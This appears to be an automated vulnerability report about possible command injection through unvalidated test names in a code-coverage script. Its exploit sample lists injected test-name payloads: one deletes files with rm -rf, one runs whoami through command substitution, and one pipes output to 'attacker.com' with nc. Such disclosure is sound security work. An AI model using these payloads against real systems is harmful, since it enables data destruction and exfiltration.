Vulnerability Details

CWE Type(s): CWE-78
Severity: HIGH
Team: Unassigned

Location

• File: tools/code_coverage/package/oss/run.py
• Lines: 28

Description

run_target() called without input validation - binary_file obtained from get_oss_binary_file() is passed to gcc_coverage.run_target() without validation. The binary file path may contain shell metacharacters or path traversal sequences.

Impact

Command injection through malicious test names or binary file paths. An attacker who can control test names can potentially inject shell commands that will be executed during coverage testing.

Root Cause

Unvalidated binary_file passed to run_target() which may use unsafe shell execution. No sanitization of test.name before being used to construct binary file paths.

Fix Status

MR Link: Not yet created
Fix Branch: N/A
Status: NOT_FIXED

Related Exploit Files

• test_cwe78_run.py

Exploit Code Sample

# Vulnerable code pattern
for test in tests:
    binary_file = get_oss_binary_file(test.name, test.test_type)
    gcc_coverage.run_target(binary_file, test.test_type)  # No validation

# Malicious test names
malicious_names = [
    "test; rm -rf /tmp/*",
    "test$(whoami)",
    "test|nc attacker.com 1234"
]

References

• CWE Reference: https://cwe.mitre.org/data/definitions/78.html

Generated by CI Security Bot